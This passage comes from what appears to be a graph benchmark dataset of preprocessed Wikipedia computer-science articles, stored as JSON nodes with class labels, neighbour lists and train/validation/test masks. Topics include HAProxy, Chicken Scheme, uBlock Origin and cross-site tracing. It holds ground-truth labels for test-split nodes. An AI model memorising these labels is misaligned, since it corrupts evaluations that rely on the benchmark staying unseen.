3 2014 david hayter set voice solid snake new fan remake currently development using unreal engine 4 titled outer heaven",
    "neighbors": [
      5762,
      8232,
      8937,
      10316,
      9006,
      9166,
      8819,
      10931,
      4317
    ],
    "mask": "Test"
  },
  {
    "node_id": 2097,
    "label": 3,
    "text": "ARM_Cortex-A77:arm cortex-a77 arm cortex-a77 microarchitecture implementing armv8.2-a 64-bit instruction set designed arm holdings austin design centre cortex-a77 4-wide decode out-of-order superscalar design new 1.5k macro-op mops cache instruction fetch 6-wide 4-wide backend 12 execution ports pipeline depth 13 stages execution latencies 10 stages cortex-a77 serves successor cortex-a76 core supports unprivileged 32-bit applications privileged applications must utilize 64-bit armv8-a isa also supports load acquire ldapr instructions armv8.3-a dot product instructions armv8.4-a pstate speculative store bypass safe ssbs bit instructions armv8.5-a arm announced 23 35 increases respectively integer floating point performance memory bandwidth increased 15 relative a76 cortex-a77 support arm dynamiq technology expected used high-performance cores used combination cortex-a55 power-efficient cores cortex-a77 available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc",
    "neighbors": [
      644,
      392,
      8842,
      781,
      398,
      6926,
      146,
      9235,
      1428,
      11282,
      7833,
      666,
      5786,
      6391,
      11289,
      6815,
      1057,
      4258,
      10658,
      5028,
      4773,
      38,
      7077,
      9638,
      5417,
      4139,
      8237,
      9774,
      7988,
      11062,
      3511,
      9913,
      8250,
      6971,
      8253,
      7745,
      10562,
      7747,
      8003,
      6981,
      10945,
      2635,
      9163,
      1871,
      1872,
      6608,
      7631,
      9042,
      980,
      2388,
      9174,
      9685,
      10199,
      9182,
      6495,
      1377,
      99,
      2788,
      3301,
      8812,
      9964,
      5358,
      10734,
      1776,
      6001,
      11629,
      373,
      1014,
      3575,
      10361,
      8058,
      3835,
      7804,
      638
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2098,
    "label": 8,
    "text": "HAProxy:haproxy haproxy free open source software provides high availability load balancer proxy server tcp http-based applications spreads requests across multiple servers written c reputation fast efficient terms processor memory usage haproxy used number high-profile websites including godaddy github bitbucket stack overflow reddit speedtest.net tumblr twitter tuenti used opsworks product amazon web services haproxy written 2000 willy tarreau core contributor linux kernel still maintains project 2013 company haproxy technologies llc created continue developing software addition contributions open-source community company provides commercial offering haproxy enterprise appliance-based application-delivery controllers named aloha company provides technical support additional modules extend functionality haproxy haproxy following features haproxy enterprise edition enterprise-class version haproxy includes robust cutting-edge code base enterprise suite add-ons expert support professional services core incorporates feature backports haproxy development branch customers require immediate access latest functionality hardened version code haproxy technologies ’ aloha plug-and-play load-balancing appliance deployed environment aloha provides graphical interface templating system used deploy configure appliance main intention direct competitor hardware load balancing boxes/appliances companies still provide separate appliance load balancers f5 networks haproxy following version releases servers equipped dual-core opteron xeon processor generally achieve 15000 40000 hits per second trouble saturating 2 gbit/sec connection linux",
    "neighbors": [
      64,
      5178,
      3237,
      8358,
      4797,
      4777,
      5835,
      10924,
      7983,
      7248,
      5139,
      4725,
      11221,
      823,
      4186,
      731,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 2099,
    "label": 4,
    "text": "Cross-site_tracing:cross-site tracing web security cross-site tracing abbreviated xst network security vulnerability exploiting http trace method xst scripts exploit activex flash controls allow executing http trace request http trace response includes http headers including authentication data http cookie contents available script combination cross domain access flaws web browsers exploit able collect cached credentials web site including utilizing ssl",
    "neighbors": [
      450,
      4797,
      10026,
      939,
      5433,
      7965
    ],
    "mask": "None"
  },
  {
    "node_id": 2100,
    "label": 0,
    "text": "UBY-LMF:uby-lmf uby-lmf format standardizing lexical resources natural language processing nlp uby-lmf conforms iso standard lexicons lmf designed within iso-tc37 constitutes so-called serialization abstract standard accordance lmf attributes linguistic terms introduced uby-lmf refer standardized descriptions meaning isocat uby-lmf implemented java actively developed open source project google code based java implementation large scale electronic lexicon uby automatically created result using uby-lmf standardize range diverse lexical resources frequently used nlp applications 2013 uby contains 10 lexicons pairwise interlinked sense level subset lexicons integrated uby converted semantic web format according lemon lexicon model conversion based mapping uby-lmf lemon lexicon model",
    "neighbors": [
      416,
      6145,
      5639,
      717,
      11056
    ],
    "mask": "None"
  },
  {
    "node_id": 2101,
    "label": 2,
    "text": "Mail_(Windows):mail windows mail email newsgroup client developed microsoft included windows 8 8.1 10 operating systems main function mail sending receiving email successor outlook express either included released windows 9x family older versions windows nt family windows mail announced microsoft successor outlook express october 10 2005 via community website channel 9 initial version featured fundamental changes new user interface much way new features origins windows mail traced back pre-release version outlook express 7 included early builds windows vista known codename longhorn version outlook express introduced various changes user interface relied winfs management storage contacts data retaining support post office protocol pop internet message access protocol imap email protocols outlook express 7 dropped support http omission inherited windows mail windows mail user interface changed match look feel windows vista interface features imported microsoft outlook 2003 including right-hand reading pane microsoft help groups added preconfigured link microsoft newsgroups additional functionality layered top standard newsgroup functionality individual threads marked question answered question postings may rated well windows mail uses ipv6 domain name servers resolves ipv6 mail messages stored individual files instead single database file transactional index database based extensible storage engine enables real-time searching improves stability reliability stored data case corruption indices rebuilt mail files account setup information longer stored windows registry instead stored alongside mail making possible copy entire windows mail configuration mail store another machine single step bayesian junk-mail filtering top-level domain blocking encoding blocking added phishing filter incorporated well protecting users web sites identified malicious removed features windows mail include windows mail documented application programming interface api based component object model com predecessor outlook express also featured api undocumented except simple mapi messaging functionality windows vista supports american english french german spanish international sort windows mail absent windows 7 time microsoft intended spin several windows components independently developed apps introduced part windows essentials software suite thus windows mail omitted favor windows live mail made available windows xp vista 7 policy eventually reverted successors windows essentials apps gradually reintegrated windows 8 8.1 10 components windows live mail succeeded mail mail added windows 8 one many apps written run full-screen snapped per microsoft metro design language philosophy n't share code windows mail windows live mail lacks newsgroups support windows store app mail included app container calendar people three uninstalled reinstalled separately mail windows 8 comes preset server configurations popular email services outlook.com exchange gmail aol mail yahoo mail imap accounts configured directly support pop even though app run windows desktop multi-window support like many microsoft apps introduced windows 8 many features hidden charms initially hidden toolbar bottom screen revealed right-clicking users subscribed microsoft account sync configurations mail across different computers mail preset server configurations outlook.com exchange gmail icloud yahoo mail aol mail custom imap accounts still added pop support returned mail calendar still windows store apps app container updated together third sibling people moved container standalone app users set windows 10 mail use system theme choose custom accent color background image light/dark preference multi-window support open email messages new window emails listed mail jumplist mail uses settings panel email sorting tools second pane toolbar viewing pane like vista version mail version important controls readily visible accounts grouped relabeled folders created within app existing folders edited deleted mail default folders possible use outlook.com aliases mentions mail like microsoft outlook mail allows users set quick actions delete set flag archive respond messages system notifications swipe gestures mail rss reader ability customize default type font microsoft announced plans add features microsoft outlook outlook express mail uses invoke search – contrary microsoft products use",
    "neighbors": [
      11270,
      5643,
      4624,
      9747,
      11285,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      8747,
      1075,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      6231,
      7255,
      10839,
      603,
      9819,
      4704,
      3170,
      8296,
      10861,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      1664,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      5784,
      11418,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      9909,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      10956,
      2782,
      9442,
      4836,
      4326,
      2279,
      9448,
      1770,
      9451,
      3308,
      10993,
      9459,
      3834,
      8443,
      1791,
      8959,
      11519,
      9986,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      1832,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      5470,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      7036,
      2943,
      3465,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      9642,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      3015,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      3578
    ],
    "mask": "Test"
  },
  {
    "node_id": 2102,
    "label": 9,
    "text": "Defun:defun defun short define function macro lisp family programming languages defines function global environment uses form defining function codice_1 adds two numbers defining function codice_2 squares number defining function returns codice_3 codice_4",
    "neighbors": [
      1152,
      10083,
      8262,
      6502,
      2062,
      10586,
      3675
    ],
    "mask": "Test"
  },
  {
    "node_id": 2103,
    "label": 0,
    "text": "LOLITA:lolita lolita natural language processing system developed durham university 1986 2000 name acronym large-scale object-based linguistic interactor translator analyzer lolita developed roberto garigliano colleagues 1986 2000 designed general-purpose tool processing unrestricted text could basis wide variety applications core semantic network containing 90,000 interlinked concepts text could parsed analysed incorporated semantic net could reasoned long garigliano 1993 fragments semantic net could also rendered back english spanish several applications built using system including financial information analysers information extraction tools darpa ’ “ message understanding conference competitions ” muc-6 muc-7 latter involved processing original wall street journal articles perform tasks identifying key job changes businesses summarising articles lolita one small number systems worldwide compete sections tasks system description analysis muc-6 results written callaghan callaghan 1998 lolita early example substantial application written functional language consisted around 50,000 lines haskell around 6000 lines c. also complex demanding application many aspects haskell invaluable development lolita designed handle unrestricted text ambiguity various levels unavoidable significant laziness essential handling explosion syntactic ambiguity resulting large grammar much used semantic ambiguity system used multiple domain specific embedded languages semantic pragmatic processing generation natural language text semantic net also important ability work complex abstractions prototype new analysis algorithms quickly later systems based design include concepts sensegraph",
    "neighbors": [
      1890,
      3876,
      293,
      7780,
      8262,
      6536,
      5399,
      7164,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2104,
    "label": 6,
    "text": "Entry_Sequenced_Data_Set:entry sequenced data set entry sequenced data set esds type data set used vsam computer data storage system records accessed based sequential order order written file means accessing particular record involves searching records sequentially located using relative physical address relative byte address rba i.e number bytes beginning file start reading keys may used access records rrds defining alternate index",
    "neighbors": [
      1801,
      746,
      2077,
      2127
    ],
    "mask": "None"
  },
  {
    "node_id": 2105,
    "label": 9,
    "text": "Chicken_(Scheme_implementation):chicken scheme implementation chicken stylized chicken programming language specifically compiler interpreter implement dialect programming language scheme compiles scheme source code standard c. mostly r5rs compliant offers many extensions standard newer r7rs standard supported extension library chicken free open-source software available bsd license implemented mostly scheme parts c performance make embedding c programs easier chicken focus quickly clear slogan practical portable scheme system chicken main focus practical application scheme writing real-world software scheme well known use computer science curricula programming language experimentation seen little use business industry chicken community produced large set libraries perform variety tasks chicken wiki software running also chicken program also contains list software written chicken chicken goal portable compiling intermediate representation case portable c gambit bigloo programs written chicken compiled common popular operating systems linux macos unix-like systems windows haiku mobile platforms ios android also built-in support cross-compiling programs extensions allows used various embedded system platforms like many scheme compilers chicken uses standard c intermediate representation scheme program translated c chicken compiler c compiler translates c program machine code target computer architecture producing executable program universal availability c makes useful purpose chicken design inspired 1994 paper henry baker outlined innovative strategy compile scheme c. scheme program compiled c functions c functions never reach return statement instead call new continuation complete continuations c functions passed extra arguments c functions calculated compiler far essence continuation-passing style baker novel idea use c call stack scheme heap hence normal c stack operations automatic variable creation variable-sized array allocation used stack fills stack pointer reaches top stack garbage collection initiated design used copying garbage collector originally devised c. j. cheney copies live continuations live objects heap despite c code copy c stack frames scheme objects require knowledge c implementation full scheme heap consists c stack nursery together two heaps required generational garbage collector approach gives speed c stack many operations allows use continuations simple calls c functions baker solution guarantees asymptotic tail recursive behavior required scheme language standard implementation chicken scheme compiler even asymptotically safe space chicken scheme mostly r5rs-compliant notable limitations deviations r7rs compatibility supplied extension library core system basic support utf-8 characters however string indexing manipulation procedures utf-8 aware extension library exists adds support full utf-8 awareness chicken large software repository added libraries programs termed eggs system similar rubygems initially eggs developed one central svn repository creating tag would automatically cause new version extension become available download currently eggs developed anywhere version control system still maintaining semi-automatic release management using popular code hosting sites release method vcs-agnostic sense user need vcses installed developer free host anywhere choose even choose avoid public version control distribute plain tarballs released eggs latest version tested automatically part continuous integration process canonical test server exists core system eggs tested daily recent development version catch regressive bugs recent stable version ensure everything works users stable system also anyone volunteer supply testing capacity different hardware operating systems core releases chicken supports r5rs standard scheme also adds nonstandard features available scheme implementations chicken compiling c makes possible inject custom c code compiled result eases integrating c libraries foreign function interface supports converting back forth built-in c types corresponding scheme objects also extension libraries exist interfacing python lua java via java native interface jni bridge relatively easy cross-compile scheme code another platform example embedded use device make cross-compiling possible scheme code chicken imposes model separate compiling compiled module consists two shared libraries one library contains actual code used runtime compiled target platform import module used load code runs compile-time host platform procedural macro code chicken compiler also easily cross-compiled translation c achieved one simply use c compiler set build another platform since version 4 chicken built-in module system support low-level hygienic macros explicit renaming macros version 4 available add-on library standard syntax-rules macros also supported implicit renaming macros basically reversed version explicit renaming mechanism trades performance convenience identifier explicitly injected unhygienic automatically renamed avoid name capture performance cost occurs implicit renaming requires macro-expander retraverse expressions two times cost paid expansion time macro author must consider longer compiling times acceptable since version 4.11 chicken comes shipped debugger named feathers scheme code compiled needed debugging option debugging events injected specific points code implemented calls c function relatively low-overhead actually debugging code debugging try make tcp connection feathers server process possibly different machine process halted user may set breakpoints start program breakpoint hit client process debugged enters command loop allows interrogation client read variables mutate chicken supports local flow analysis allows compiler catch variable type errors compile-time perform type specialisation specialisation makes possible remove several safety checks type detection runtime type deduced compile-time results improved run-time performance scrutinizer allow cross-module flow analysis used optimize code part one compiling unit module",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      1556,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      3132,
      6717,
      7234,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      9320,
      2666,
      9330,
      5751,
      7805,
      9345,
      1159,
      9865,
      6797,
      9877,
      10395,
      4777,
      5803,
      2225,
      7347,
      7867,
      4799,
      7880,
      6345,
      8908,
      205,
      5837,
      9932,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      9964,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      2832,
      1301,
      5397,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10584,
      10083,
      6502,
      11625,
      8554,
      3446,
      1399,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      5040,
      7612,
      7616,
      5569,
      6594,
      4550,
      5578,
      10703,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      5612,
      9714,
      7670,
      11255,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2106,
    "label": 8,
    "text": "Java_API_for_RESTful_Web_Services:java api restful web services jax-rs java api restful web services jax-rs java programming language api spec provides support creating web services according representational state transfer rest architectural pattern jax-rs uses annotations introduced java se 5 simplify development deployment web service clients endpoints version 1.1 jax-rs official part java ee 6 notable feature official part java ee configuration necessary start using jax-rs non-java ee 6 environments small entry web.xml deployment descriptor required jax-rs provides annotations aid mapping resource class pojo web resource annotations use java package codice_1 include addition provides annotations method parameters pull information request codice_10 annotations take key form used look value required january 2011 jcp formed jsr 339 expert group work jax-rs 2.0 main targets among others common client api support hypermedia following hateoas-principle rest may 2013 reached final release stage 2017-08-22 jax-rs 2.1 specification final release published main new supported features include server-sent events reactive clients json-b implementations jax-rs include",
    "neighbors": [
      9988,
      3341,
      1051,
      7965,
      10526,
      8096,
      10020,
      7592,
      5677,
      7983,
      6067,
      10555,
      4797,
      3517,
      3518,
      3008,
      6334,
      9665,
      11582,
      1095,
      3278,
      3920,
      10579,
      4959,
      4960,
      1250,
      3558,
      1128,
      3560,
      3562,
      8425,
      5612,
      9834,
      3954,
      3323,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 2107,
    "label": 4,
    "text": "Acronis_True_Image:acronis true image acronis true image software product produced acronis provides data protection personal users including backup archive access recovery windows macos ios android operating systems disk imaging software true image restore previously captured image another disk replicating structure contents new disk also allowing disk cloning partition resizing even new disk different capacity backups proprietary format saves using .tib filename format acronis launched 2003 december 2014 claimed 5 million consumer 500,000 businesses users several editions acronis true image available acronis true image cloud subscription-based software plus service offering allows local online backup unlimited cloud backup offers backup selection mobile phones tablets successive versions acronis true image local backup editions editions available retail outlets release 9 versions acronis true image personal business users business versions named acronis true image server later server backup software renamed acronis backup acronis true image make two types backups file backup backing user-specified files directories full system images exact snapshots entire disk partition program back system hard drive os running acronis true image browse contents backups restore partially entirely also mount disk backup virtual disk readable way disk drive although backups restored system running major purpose backup restore system fails start acronis true image install acronis startup recovery manager asrm computer program helps restore backups boot time acronis true image also create copy acronis rescue media bootable dvd contains copy acronis true image restore backups computer bootable normal way long good boot drive existing new available acronis true image cloud version allows cloud users also back mobile devices iphone android smartphones supported addition ipad windows tablets edition also brings back try decide option lets users perform potentially risky actions installation un-trusted software option returning system function action problems occur acronis true image cloud allows multiple devices backed managed archived acronis cloud online dashboard acronis true image supports multiple file systems including ntfs fat32 ext2 ext3 ext4 hfs+ apfs reiserfs linux swap addition backing supported file systems acronis true image provides raw sector backup restore options independent file system thereby supporting file system corrupt supported creates complete image sectors partition whether contain data image compressed size partition acronis began 2001 division swsoft 2003 became separate company continued release acronis true image software true image name applied platforms home corporate 2010 acronis business backup software renamed true image home version acronis true image guarantees backward compatibility image files .tib extension created single previous version images created immediate previous version successfully restored older versions may may work backups created compatible different editions acronis true image within version home enterprise e.g. former acronis true image echo workstation acronis true image echo enterprise server linux windows versions compatibility guaranteed products within version guaranteed cross-version compatibility documented vmware converter virtualization company vmware supports converting .tib files created former acronis true image echo 9.1 9.5 acronis true image home 10 11 virtual machine however vmware converter failed recognize acronis true image 2013 .tibs vmware said unfortunately vmware converter n't support current acronis true image versions acronis true image option convert backups proprietary .tib microsoft vhd backup format widely supported documented microsoft open specification promise acronis licensed custom versions acronis true image hard disk manufacturers including western digital acronis true image wd edition intel data migration software migrate existing hard drive intel ssd seagate discwizard editions free download use manufacturer hard drives",
    "neighbors": [
      5380,
      9732,
      3463,
      6153,
      6797,
      2193,
      2194,
      11539,
      2197,
      7189,
      2199,
      9762,
      2981,
      7983,
      8376,
      2107,
      9025,
      7364,
      1358,
      106,
      4972,
      5356,
      10476,
      3314,
      246,
      8572
    ],
    "mask": "None"
  },
  {
    "node_id": 2108,
    "label": 4,
    "text": "UBlock_Origin:ublock origin ublock origin you-block free open-source cross-platform browser extension content-filtering including ad-blocking extension available several browsers chrome chromium edge firefox opera safari beta ublock origin received praise technology websites reported much less memory-intensive extensions similar functionality ublock origin stated purpose give users means enforce content-filtering choices ublock origin continues actively developed maintained founder lead developer raymond hill ublock origin initially named μblock name later changed ublock avoid confusion greek letter µ mu/micro µblock pronounced development started forking codebase http switchboard along another blocking extension called umatrix designed advanced users ublock origin developed raymond hill leverage community-maintained block lists adding features raising code quality release standards first released june 2014 chrome opera extension winter 2015 extension expanded browsers april may 2015 ublock project forked chris aljoudi continuing effort original developer raymond hill renamed ublock origin since april 2015 ublock origin completely unrelated aljoudi project owned adblock chris aljoudi created ublock.org host ublock promote extension request donations response ublock original founder raymond hill stated donations sought ublock.org benefiting contributed create ublock origin development ublock stopped august 2015 sporadically updated since january 2017 july 2018 ublock.org acquired adblock began allowing acceptable ads program run adblock plus allows ads deemed acceptable publisher pays adblock plus ublock origin remains independent allow ads payment raymond hill founder original author ublock continues work extension name ublock origin sometimes stylized ublock₀ january 2018 ublock origin chrome extension 10 million active users firefox version 5 million active users joint sourcepoint comscore survey reported 833 growth rate ten-month tracking period ending august 2015 strongest growth software listed report attributed growth desire users pure blockers outside acceptable advertising program january 2016 ublock origin added repositories debian 9 ubuntu 16.04 extension awarded pick month mozilla may 2016 nik rolls officially released ublock origin microsoft edge browser december 11 2016 project specifically refuses donations ublock origin supports majority adblock plus filter syntax popular filter lists easylist easyprivacy enabled default subscriptions extensions capable importing hosts files number community-maintained lists available installation among host files available peter lowe ad servers list malware domains also enabled default additional features include dynamic filtering scripts iframes tool webpage element hiding ublock origin includes growing list features available ublock including new mode assist color vision deficiency new dynamic url filtering feature new logging functionality interface enhancements including dom inspector new privacy-oriented options block link prefetching hyperlink auditing ip address leaks via webrtc ubo-extra required block webrtc connections chromium site-specific switches toggle blocking pop-ups strict domain blocking cosmetic filtering blocking remote fonts javascript disabling also added recent releases ublock origin firefox version ublock origin extra feature helps foil attempts web sites circumvent blockers technology websites user reviews ublock origin regarded extension less resource intensive extensions provide similar feature sets adblock plus benchmark test conducted august 2015 ten blocking extensions showed ublock origin resource efficient among extensions tested ublock origin surveys style resources required individual web page rather reliance universal style sheet extension takes snapshot filters user enabled contributes accelerated browser start-up speed compared retrieving filters cache every time ublock origin actively developed applications based 4 major engines",
    "neighbors": [
      5536,
      2051,
      5407,
      4326,
      3462,
      487,
      8584,
      5612,
      7983,
      2611,
      10900,
      11221,
      5078,
      4728,
      11418,
      5343
    ],
    "mask": "None"
  },
  {
    "node_id": 2109,
    "label": 2,
    "text": "Lennart_Poettering:lennart poettering lennart poettering born october 15 1980 german software engineer created pulseaudio avahi systemd poettering born guatemala city grew rio de janeiro brazil hamburg germany poettering worked red hat since least 2008 since 2003 poettering worked 40 projects mostly written c. developer maintainer several free software projects widely adopted linux distributions including pulseaudio 2004 avahi 2005 systemd 2010 poettering known controversial technical architectural positions regarding linux ecosystem style brought accusations working long-standing unix philosophy addressed blog post biggest myths instance poettering advocated speeding linux development expense breaking compatibility posix unix-like operating systems bsds took position experience writing low-level components desktop stack invites developers poettering recommends also reading linux programming interface ignoring posix-specific parts 2011 poettering one main developers pulseaudio praised windows macos audio stacks advanced called oss simplistic 90 style audio stack without relevance modern desktop also 2011 asked linux desktop n't widely adopted mainstream users answered linux still fragmented ... needs streamlined ... 2014 poettering published essay criticising software linux distros commonly packaged updated deployed laid proposals kay sievers harald hoyer daniel mack tom gundersen david herrmann architecture changed controversy around systemd culminated personal attacks alleged death threats poettering october 2014 poettering complained open source community full assholes probably others one favourite targets poettering went put blame linus torvalds kernel developers bad role models encouraging abusive discussion culture technical disagreements 2017 received pwnie award lamest vendor response",
    "neighbors": [
      1026,
      3330,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      5397,
      6808,
      7450,
      6302,
      7584,
      161,
      802,
      5410,
      6180,
      6691,
      6694,
      6947,
      8354,
      9507,
      5931,
      8364,
      8621,
      7983,
      1717,
      823,
      9660,
      11069,
      9151,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      593,
      4177,
      8787,
      11602,
      4437,
      6489,
      3802,
      4831,
      9696,
      10977,
      11232,
      9455,
      7793,
      1394,
      1396,
      2036,
      3189,
      11643,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2110,
    "label": 4,
    "text": "Rubber-hose_cryptanalysis:rubber-hose cryptanalysis cryptography rubber-hose cryptanalysis euphemism extraction cryptographic secrets e.g password encrypted file person coercion torture—such beating person rubber hose hence name—in contrast mathematical technical cryptanalytic attack according amnesty international un many countries world routinely torture people therefore logical assume least countries use would willing use form rubber-hose cryptanalysis practice psychological coercion prove effective physical torture physically violent highly intimidating methods include tactics threat harsh legal penalties incentive cooperate may form plea bargain offer drop reduce criminal charges suspect return full co-operation investigators alternatively countries threats may made prosecute co-conspirators inflict violence upon close relatives e.g spouse children parents person questioned unless co-operate contexts rubber-hose cryptanalysis may viable attack need decrypt data covertly information password may lose value known compromised argued one purposes strong cryptography force adversaries resort less covert attacks earliest known use term sci.crypt newsgroup message posted 16 october 1990 marcus j. ranum alluding corporal punishment although term used tongue-in-cheek implications serious modern cryptosystems weakest link often human user direct attack cipher algorithm cryptographic protocols used likely much expensive difficult targeting people use manage system thus many cryptosystems security systems designed special emphasis keeping human vulnerability minimum example public-key cryptography defender may hold key encrypt message decryption key needed decipher problem defender may unable convince attacker stop coercion plausibly deniable encryption second key created unlocks second convincing relatively harmless message example apparently personal writings expressing deviant thoughts desires type lawful taboo defender prove handed keys whilst attacker remains unaware primary hidden message case designer expectation attacker realize forego threats actual torture risk however attacker may aware deniable encryption assume defender knows one key meaning attacker may refuse stop coercing defender even one keys revealed assumption defender still withholding additional keys hold additional information jurisdictions statutes assume opposite—that human operators know access things session keys assumption parallels made rubber-hose practitioners example united kingdom regulation investigatory powers act makes crime surrender encryption keys demand government official authorized act according home office burden proof accused person possession key rests prosecution moreover act contains defense operators lost forgotten key liable judged done recover key lead-up 2017 kenyan general election head information communication technology independent electoral boundaries commission christopher msando murdered played major role developing new voting system election body showed apparent marks torture concerns murderers tried get password information",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      3350,
      1315,
      4389,
      10662,
      169,
      302,
      11185,
      3252,
      2357,
      10806,
      9528,
      9541,
      10315,
      6863,
      8273,
      4435,
      212,
      9556,
      10963,
      2265,
      7643,
      8283,
      6494,
      9697,
      8674,
      618,
      1898,
      881,
      6773,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 2111,
    "label": 2,
    "text": "Purism_(company):purism company purism spc computer technology social purpose corporation based south san francisco california registered state washington purism manufactures librem personal computing devices focus software freedom computer security internet privacy purism founded 2014 start crowdfunding campaign librem 15 attempt manufacture intel-based high-end laptop linux almost proprietary software second campaign funded development 13-inch model hardware switches disable microphone camera privacy feature kill switches also added 15-inch model two campaigns raised 1,042 initial backers production began end 2015 2017 purism announced transition build order build stock order fulfillment model purism reincorporated social purpose corporation february 2017 announced change may august 24 2017 purism announced plans build smartphone librem 5 baseband processor separate main cpu hardware kill switches baseband wi-fi bluetooth camera microphone running free open-source software 60-day crowdfunding campaign raised phone purism manages development pureos fully free linux distribution based debian pureos mostly ships software debian software repository software removed violates purism guidelines notably mozilla firefox web browser rebranded purebrowser ships plug-ins enhance user privacy pureos endorsed free software foundation december 2017 librem laptops ship pureos default optional qubes os universal serial bus usb drive purism says easy librem owners install alternative linux distributions owners freedom install operating system wish install librem brand name used purism computer hardware products since firm first website late 2014 name based french word libre english word free used term libre software free software purism devices feature hardware kill switches allow users shut camera wi-fi bluetooth cellular mobile broadband modem devices one purchased air gapped purism first products two laptop computers since late 2015 made laptops two sizes librem 13 15 featuring 13 15 inch screen respectively products ship purism operating system pureos derivative debian gnu/linux optional qubes os usb drive purism proposed 2-in-1 pc convertible hybrid tablet-to-laptop computer librem 11 sometimes termed librem 10 12 would 11-inch touchscreen 11.6-inch body detachable keyboard optional docking station development device began april 2016 suspended october 2018 focus librem 5 smartphone purism developing smartphone began funding campaign 24 august 2017 599 security privacy focused phone librem 5 60-day funding campaign aimed collect however goal surpassed two weeks early concluded us 2,677,609.10 raised 78 goal phone would run entirely free firmware software debian derivative choice desktop environments gnome kde plasma mobile ubuntu touch unlike phone baseband processor separated cpu main bus instead connected via fast usb interface thus isolated main cpu ram bus also phone feature hardware kill switches isolated baseband processor wi-fi bluetooth camera microphone librem key hardware usb security token many features including integration tamper-evident heads firmware heads helps ensure librem laptop bios altered since last laptop boot librem key also holds one-time password storage 3x hotp nowiki rfc 4226 /nowiki 15 x totp nowiki rfc 6238 /nowiki integrated password manager 16 entries 40 kbit/s true random number generator tamper-resistant smart card key supports type usb 2.0 dimensions weights librem one paid-subscription free-software social-networking suite launched april 30 2019 bring decentralized privacy-respecting applications wider user base first components released librem mail supporting openpgp standards using k-9-based client librem tunnel based openvpn librem social microblogging using mastodon server tusky-based client software federated via activitypub protocol librem chat using riot.im software federated via matrix xmpp librem files file sharing services planned",
    "neighbors": [
      1761,
      8574,
      10242,
      7492,
      1515,
      2383,
      1776,
      3959,
      7857,
      2259,
      2228,
      823,
      1083,
      4444,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2112,
    "label": 4,
    "text": "Galina_Kofman:galina kofman galina kofman computer scientist business executive author kerberos protocol various ibm systems kofman also authored ftp ibm vm/cms os/2 received two ibm ceo outstanding technical achievements awards holds patent grid applications kofman executive recyclebank green company rewards people recycling researcher thomas watson research center galina kofman worked group barry appelman significant internet notable inventor instant messaging kofman active internet protocols development specifically tcp/ip since 1983 first project rlss remote login system predecessor telnet ibm appelman group whole proved critical ibm early embrace internet despite competing family protocols ibm systems network architecture kofman authored kerberos os/2 vm/cms aix also authored ftp client server vm/cms os/2 kofman also authored network time protocol various ibm operating systems kofman also active algorithms related processing unstructured text kofman program manager main developer ibm magic system 2006 according recyclebank press release galina kofman received 2 ibm ceo outstanding achievement awards one 1990 another 1992 galina kofman currently executive recyclebank green company",
    "neighbors": [
      4546,
      7364,
      10344,
      6098,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 2113,
    "label": 3,
    "text": "Memory-level_parallelism:memory-level parallelism memory-level parallelism mlp term computer architecture referring ability pending multiple memory operations particular cache misses translation lookaside buffer tlb misses time single processor mlp may considered form instruction-level parallelism ilp however ilp often conflated superscalar ability execute one instruction time e.g processor intel pentium pro five-way superscalar ability start executing five different microinstructions given cycle handle four different cache misses 20 different load microinstructions time possible machine superscalar nevertheless high mlp arguably machine ilp superscalar executes one instruction time non-pipelined manner performs hardware prefetching software instruction-level prefetching exhibits mlp due multiple prefetches outstanding ilp multiple memory operations outstanding instructions instructions often conflated operations furthermore multiprocessor multithreaded computer systems may said exhibit mlp ilp due parallelism—but intra-thread single process ilp mlp often however restrict terms mlp ilp refer extracting parallelism appears non-parallel single threaded code",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      6184,
      3630,
      6705,
      7218,
      2623,
      7234,
      3142,
      2638,
      604,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
